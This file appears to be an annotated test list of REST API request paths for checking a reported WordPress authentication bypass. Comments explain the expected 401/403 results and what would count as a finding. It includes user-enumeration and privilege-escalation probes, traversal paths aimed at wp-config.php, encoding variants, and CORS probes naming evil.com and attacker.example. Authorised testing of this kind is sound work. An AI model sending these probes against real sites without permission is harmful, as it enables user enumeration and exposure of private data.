# CVE-2026-28515: WordPress Core REST API Authentication/Authorization Bypass (as reported)
# Severity: Critical (CVSS 9.8) -- as reported; confirm the score against the published advisory
# Affected Versions: WordPress 6.4.0 - 6.4.2 -- as reported; confirm against the WordPress
# security release notes before relying on the version range
# Description: Reported authentication bypass in WordPress core in which crafted REST API
# requests return data, or perform actions, that should require an authenticated and
# sufficiently privileged user.
# Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28515
#
# How to use this list: each line is a request path relative to the site root, sent with
# NO credentials (no cookie, no nonce, no Application Password). On a patched site the
# privileged requests below must answer 401/403 with a rest_* error code (for example
# rest_forbidden_context); a 200 carrying privileged fields (email, capabilities,
# draft/private content, settings, the plugin list) is the authorization failure.
# Several sections mention headers, methods or request bodies that a path list cannot
# carry -- add those in the client. Several endpoints below are public by design and are
# included only as a baseline or for enumeration, not as evidence of the vulnerability.
# Test only systems you are authorized to assess.

# Privileged context/field requests. context=edit, and the capabilities /
# extra_capabilities / email fields it exposes, are only returned to users with
# list_users or edit_users; unauthenticated these must come back 401 (typically
# rest_forbidden_context on the collection, rest_user_cannot_view on a single user).
# A 200 that includes email or capabilities for a user other than the requester is the
# authorization failure this list is looking for.
/wp-json/wp/v2/users?context=edit
/wp-json/wp/v2/users/1?context=edit
/wp-json/wp/v2/users?_fields=id,name,email,capabilities
/wp-json/wp/v2/users/1?_fields=id,name,email,capabilities,extra_capabilities

# Non-public post status filters. status=draft|private|future requires edit_posts for
# that status; an unauthenticated request is rejected (rest_forbidden_status) rather than
# returning an empty list. No custom headers are encoded in this file -- add Authorization
# or X-WP-Nonce in the client when testing an authenticated-but-underprivileged user.
/wp-json/wp/v2/posts?status=draft&_fields=id,title,content
/wp-json/wp/v2/posts?status=private&_fields=id,title,content
/wp-json/wp/v2/posts?status=future&_fields=id,title,content

# User enumeration. /wp/v2/users is public by design and lists every user who has
# authored a published post (id, name, slug, avatar_urls); it builds a username list for
# credential attacks but is not itself the bypass. roles=, and orderby values such as
# email or registered_date, require list_users and must be refused anonymously; per_page
# is capped at 100.
/wp-json/wp/v2/users
/wp-json/wp/v2/users?per_page=100
/wp-json/wp/v2/users?orderby=id&order=asc
/wp-json/wp/v2/users?search=admin
/wp-json/wp/v2/users?roles=administrator
/wp-json/wp/v2/users?roles=editor
/wp-json/wp/v2/users?context=view&_fields=id,name,slug,avatar_urls

# Context variations. _envelope only wraps the response (status, headers, body) in a JSON
# object and does not alter the permission check. context=embed is a public, reduced
# field set, so a 200 there is expected; only an unauthenticated 200 on context=edit
# (users, posts, pages) indicates a bug.
/wp-json/wp/v2/users/1?context=edit&_envelope
/wp-json/wp/v2/users/1?context=embed&_envelope
/wp-json/wp/v2/posts?context=edit&_envelope
/wp-json/wp/v2/pages?context=edit&_envelope

# Nonce handling. Core's cookie-auth filter verifies any _wpnonce that is present: an
# empty or invalid value fails wp_verify_nonce and the request is rejected with 403
# rest_cookie_invalid_nonce, not treated as logged in; with no nonce at all the request
# is simply anonymous. A 200 with edit-context data here would mean the nonce check was
# skipped (confirm against the target version).
/wp-json/wp/v2/users/1?_wpnonce=
/wp-json/wp/v2/users/1?_wpnonce=null
/wp-json/wp/v2/users/1?_wpnonce=0
/wp-json/wp/v2/users/1?_wpnonce=false

# Method override. Core accepts the _method query parameter (and the
# X-HTTP-Method-Override header) as an override for clients that cannot send
# PUT/PATCH/DELETE, routing the request to the update/delete handler; in recent core this
# applies regardless of the real HTTP method -- confirm on the target. Those handlers
# require edit_users / delete_users on the target user and must 401 unauthenticated.
/wp-json/wp/v2/users/1
/wp-json/wp/v2/users/1?_method=PUT
/wp-json/wp/v2/users/1?_method=PATCH
/wp-json/wp/v2/users/1?_method=DELETE

# Application Password endpoints. /users/me requires an authenticated request and returns
# 401 rest_not_logged_in otherwise; application_passwords is not a field of the user
# resource, so that _fields value selects nothing. The /application-passwords routes
# require edit_user on the target and never return the password itself (only
# uuid/app_id/name/created/last_used/last_ip), so they test authorization, not secret
# disclosure.
/wp-json/wp/v2/users/me?context=edit
/wp-json/wp/v2/users/me?_fields=application_passwords
/wp-json/wp/v2/users/1/application-passwords
/wp-json/wp/v2/users/1/application-passwords?_fields=uuid,name,created

# Session tokens. session_tokens is not part of the users REST schema, so
# _fields=session_tokens selects nothing regardless of auth; session data lives in user
# meta and is not exposed by core REST. Keep these only as a negative control.
/wp-json/wp/v2/users/1?_fields=session_tokens
/wp-json/wp/v2/users/me?_fields=session_tokens,capabilities

# filter[] parameters. The filter[...] syntax was dropped from core when the REST API
# merged (WP 4.7); without the rest-filter plugin these keys are ignored and the request
# behaves like the bare collection request. A response that honours post_status=private
# here points at a plugin, not core.
/wp-json/wp/v2/users?filter[orderby]=id
/wp-json/wp/v2/users?filter[order]=asc
/wp-json/wp/v2/users?filter[meta_key]=wp_capabilities
/wp-json/wp/v2/posts?filter[post_status]=draft
/wp-json/wp/v2/posts?filter[post_status]=private

# Dot-segment paths. Web servers and PHP normally collapse ".." before WordPress sees the
# route, so these resolve to the same /wp/v2/users/1 request; they exercise the server
# and any WAF/proxy in front, not REST permission checks. Compare the response with the
# plain path rather than reading a 200 as a bypass.
/wp-json/wp/v2/users/../users/1
/wp-json/wp/v2/../wp/v2/users/1
/wp-json/wp/v2/users/1/../1
/wp-json/wp/v2/users/1/../../users/1

# Core read-only endpoints. /settings requires manage_options (401 unauthenticated) and
# exposes the admin email, site URL and similar -- a 200 there is a finding. types,
# statuses and taxonomies return public entries in view context, so a 200 is expected.
/wp-json/wp/v2/settings
/wp-json/wp/v2/settings?_fields=title,description,url
/wp-json/wp/v2/types
/wp-json/wp/v2/statuses
/wp-json/wp/v2/taxonomies

# Media library (read requests, not uploads: an upload is a multipart POST to
# /wp/v2/media and requires upload_files). Listing public attachments is allowed
# anonymously; context=edit must 401 (rest_forbidden_context), and status=inherit is the
# normal attachment status so it adds nothing on its own.
/wp-json/wp/v2/media
/wp-json/wp/v2/media?context=edit
/wp-json/wp/v2/media?status=inherit
/wp-json/wp/v2/media?media_type=image

# Plugin/theme listing. /plugins requires activate_plugins and /themes requires
# edit_theme_options (recent core also lets users with edit_posts read themes?status=active,
# but never anonymous callers); all four must 401 unauthenticated. A 200 discloses
# installed plugin/theme versions, which is high-value recon for known plugin CVEs.
/wp-json/wp/v2/plugins
/wp-json/wp/v2/themes
/wp-json/wp/v2/plugins?status=active
/wp-json/wp/v2/themes?status=active

# Batch endpoint. /batch/v1 only accepts POST with a JSON body such as
# {"requests":[{"method":"POST","path":"/wp/v2/users/1"}]}; the query-string form below
# is not parsed and a GET to the route is a 404 rest_no_route. Sub-requests run through
# the same permission callbacks as direct requests, only routes flagged allow_batch are
# eligible, and the batch spec does not support GET sub-requests -- batching is not a
# bypass by itself.
/wp-json/batch/v1?requests[0][path]=/wp/v2/users/1&requests[0][method]=GET
/wp-json/batch/v1?requests[0][path]=/wp/v2/users&requests[1][path]=/wp/v2/posts

# Array-style parameters. _fields[] and include[]/exclude[] are alternative encodings of
# the same comma-separated parameters and go through the same sanitisation. status=any
# is not a registered post status and is either rejected (rest_invalid_param) or gated on
# edit_posts; either way it must not return drafts anonymously. Keep these for WAF-evasion
# comparison, not as distinct bypasses.
/wp-json/wp/v2/users/1?_fields[]=id&_fields[]=name&_fields[]=capabilities
/wp-json/wp/v2/users?include[]=1&include[]=2&context=edit
/wp-json/wp/v2/users?exclude[]=1&per_page=100
/wp-json/wp/v2/posts?author=1&status=any&context=edit

# Encoding variants. %2F/%2f encode the slash inside the route; whether it reaches
# WordPress decoded depends on the web server (Apache AllowEncodedSlashes, nginx
# merge_slashes), and core matches routes against the path as the server delivers it, so
# a 404 is the normal outcome. %00/%0a/%0d probe null-byte and newline handling in the
# server/PHP layer; they do not affect REST permission checks.
/wp-json/wp/v2/users%2F1
/wp-json/wp/v2/users%2f1
/wp-json/wp/v2/users/1%00
/wp-json/wp/v2/users/1%0a
/wp-json/wp/v2/users/1%0d

# Double encoding. %252F decodes once (at the server) to %2F, which core does not decode
# again, so these normally 404; a response matching the plain /users/1 request means a
# proxy or WAF in front decoded twice, which is the actual finding.
/wp-json/wp/v2/users%252F1
/wp-json/wp/v2/users%252f1

# Case variation. Core matches REST routes case-insensitively (the route regex is applied
# with the i flag), so /WP/V2/Users/1 hits the same handler and the same permission
# callback as the lowercase path; these only matter for case-sensitive allow/deny rules
# in a proxy or WAF sitting in front of WordPress.
/wp-json/WP/V2/users/1
/wp-json/Wp/V2/users/1
/wp-json/wp/V2/Users/1

# Path traversal. The REST router only dispatches to registered routes and never opens
# files, so wp-config.php cannot be read through /wp-json regardless of traversal. After
# server-side normalisation these become /wp-json/wp/v2/settings, /wp-admin/ and
# /wp-config.php (which PHP executes and returns empty). Treat them as server/WAF
# checks, not REST findings.
/wp-json/wp/v2/users/1/../../settings
/wp-json/wp/v2/users/1/../../../wp-admin/
/wp-json/wp/v2/../../../wp-config.php

# Response-format variants (no Accept header is encoded here; set it in the client).
# _jsonp=callback wraps the JSON in a script-callable function only when JSONP is enabled
# (rest_jsonp_enabled) and the callback name is restricted to word characters and dots;
# _embed adds _embedded linked resources. Neither changes the permission check; the JSONP
# case matters only for cross-origin reads of data the site already serves anonymously.
/wp-json/wp/v2/users/1
/wp-json/wp/v2/users/1?_jsonp=callback
/wp-json/wp/v2/users/1?_embed

# CORS probes. The origin and callback query parameters are not read by core: CORS is
# driven by the Origin request header, and JSONP uses _jsonp, not callback. Core's
# rest_send_cors_headers reflects the request Origin with Access-Control-Allow-Credentials:
# true by design -- cookie-authenticated cross-origin reads are blocked by the nonce
# requirement, not by CORS -- so test by sending Origin: https://attacker.example and
# checking whether a cookie-bearing request returns more than the anonymous view.
/wp-json/wp/v2/users?origin=http://evil.com
/wp-json/wp/v2/users?callback=malicious

# User-Agent variants (set the header in the client; nothing in these paths changes it).
# Core does not consult the User-Agent in REST permission checks, so this only exercises
# WAF/bot rules. _locale=user requests the current user's admin locale and is a no-op
# for an anonymous caller.
/wp-json/wp/v2/users/1
/wp-json/wp/v2/users/1?_locale=user

# Role/capability changes. Changing roles requires a POST/PUT to /users/<id> with
# edit_user on the target (and promote_user for the role change); query parameters on a
# GET are ignored, and capabilities / meta[wp_capabilities] are not writable user fields
# in core (REST meta writes only reach registered meta). Send these as authenticated
# POSTs from a low-privilege account to test vertical escalation; an anonymous success
# would be the bypass.
/wp-json/wp/v2/users/1?roles[]=administrator
/wp-json/wp/v2/users/1?capabilities[manage_options]=true
/wp-json/wp/v2/users/1?meta[wp_capabilities][administrator]=1

# Non-core namespaces. wp/v3 does not exist (404 rest_no_route); custom/v1 and
# myplugin/v1 are placeholders. Enumerate real namespaces from GET /wp-json (the
# "namespaces" key) and review each plugin route's permission_callback -- routes
# registered with __return_true or no callback are the usual real-world source of
# unauthenticated data exposure, not core.
/wp-json/custom/v1/users
/wp-json/myplugin/v1/users
/wp-json/wp/v3/users

# Date filters. before/after are not parameters of the users endpoint and are silently
# dropped (unknown parameters are ignored, not rejected); modified_after on posts is valid
# but only narrows what the caller may already see. No authorization boundary is involved.
/wp-json/wp/v2/users?before=2026-01-01T00:00:00
/wp-json/wp/v2/users?after=2020-01-01T00:00:00
/wp-json/wp/v2/posts?modified_after=2020-01-01T00:00:00

# Search probes. search is handed to WP_User_Query / WP_Query as a string: a leading or
# trailing * on users is treated as a wildcard by WP_User_Query, % is escaped as a
# literal, and none of them widen the result set beyond what the caller may already view
# (anonymous user search still only covers users with published posts). search=password
# on posts only matches public content containing that word.
/wp-json/wp/v2/users?search=*
/wp-json/wp/v2/users?search=%
/wp-json/wp/v2/users?search=a*
/wp-json/wp/v2/posts?search=password

# Meta parameters. meta_query and meta_key are not REST parameters for users or posts in
# core and are silently dropped; they only take effect if a plugin adds them through the
# rest_*_query filters. An unchanged response here is the expected result.
/wp-json/wp/v2/users?meta_query[0][key]=wp_capabilities
/wp-json/wp/v2/posts?meta_query[0][key]=_edit_lock
/wp-json/wp/v2/posts?meta_key=_wp_page_template

# Slug lookups. slug= on users and posts is a public filter; it confirms whether a
# username/slug exists (entries vs an empty array), which is enumeration, not a bypass.
# Users without published posts remain hidden from anonymous callers.
/wp-json/wp/v2/users?slug=admin
/wp-json/wp/v2/users?slug[]=admin&slug[]=administrator
/wp-json/wp/v2/posts?slug=sample-page

# Revisions. /posts/<id>/revisions requires edit_post on the parent (401 rest_cannot_read
# unauthenticated); revisions can hold content later removed from the published post, so
# an anonymous 200 is a genuine disclosure.
/wp-json/wp/v2/posts/1/revisions
/wp-json/wp/v2/posts/1/revisions?context=edit
/wp-json/wp/v2/pages/1/revisions

# Autosaves. /posts/<id>/autosaves requires edit_post on the parent, like revisions; an
# autosave can hold unpublished draft text, so the same disclosure concern applies.
/wp-json/wp/v2/posts/1/autosaves
/wp-json/wp/v2/posts/1/autosaves?context=edit

# Comment filters (read-only GETs, not manipulation). status=hold|spam and author_email
# require moderate_comments / edit_posts and must be refused anonymously
# (rest_forbidden_param); only approved comments are visible to anonymous callers.
/wp-json/wp/v2/comments?post=1&status=hold
/wp-json/wp/v2/comments?post=1&status=spam
/wp-json/wp/v2/comments?author_email=admin@site.com

# Reusable blocks / block renderer. /blocks (the wp_block post type) requires edit_posts
# on each block, so anonymous callers get an empty list or 401 rather than content;
# /block-renderer/<block> requires edit_posts (rest_block_cannot_read) and only renders
# server-side blocks with the attributes you pass. Both must be refused anonymously.
/wp-json/wp/v2/blocks
/wp-json/wp/v2/blocks?context=edit
/wp-json/wp/v2/block-renderer/core/latest-posts

# Widgets/sidebars. /widgets and /sidebars require edit_theme_options (401
# rest_cannot_manage_widgets unauthenticated); widget instances can embed arbitrary HTML
# and plugin settings, so an anonymous 200 is a real disclosure.
/wp-json/wp/v2/widgets
/wp-json/wp/v2/widgets?context=edit
/wp-json/wp/v2/sidebars

# Navigation menus. In current core /menus and /menu-items need at least edit_posts to
# read (edit_theme_options to modify; rest_cannot_view otherwise) and /menu-locations
# needs edit_theme_options, so all three must 401 anonymously. Menu data is low
# sensitivity but can leak titles/URLs of unpublished pages.
/wp-json/wp/v2/menus
/wp-json/wp/v2/menu-items
/wp-json/wp/v2/menu-locations

# Block templates / global styles. /templates and /template-parts require
# edit_theme_options (rest_cannot_manage_templates); the bare /global-styles route does
# not exist (it takes an id, e.g. /global-styles/<id>) and its items are likewise gated
# on edit_theme_options in current core. They expose theme markup and custom CSS; 401
# is expected anonymously.
/wp-json/wp/v2/templates
/wp-json/wp/v2/template-parts
/wp-json/wp/v2/global-styles

# Block patterns. /block-patterns/patterns and /block-patterns/categories require
# edit_posts (401 rest_cannot_view unauthenticated); the patterns endpoint returns
# registered pattern markup, including theme-bundled patterns, so it is informative but
# rarely sensitive.
/wp-json/wp/v2/block-patterns/patterns
/wp-json/wp/v2/block-patterns/categories

# Site Health. Both routes require view_site_health_checks (administrators only; 403
# rest_forbidden otherwise). tests/background-updates reveals whether core auto-updates
# function and directory-sizes reveals filesystem paths and sizes -- useful recon if an
# anonymous 200 comes back.
/wp-json/wp-site-health/v1/tests/background-updates
/wp-json/wp-site-health/v1/directory-sizes

# Custom post types. custom_post_type is a placeholder: the REST route is the type's
# rest_base (often not its slug) and only exists when show_in_rest is true -- read the
# real list from GET /wp-json/wp/v2/types at your privilege level. Private or non-public
# CPTs exposed in REST are a common plugin misconfiguration; check context=edit and
# status=any against each one.
/wp-json/wp/v2/custom_post_type
/wp-json/wp/v2/custom_post_type?status=any
/wp-json/wp/v2/custom_post_type?context=edit
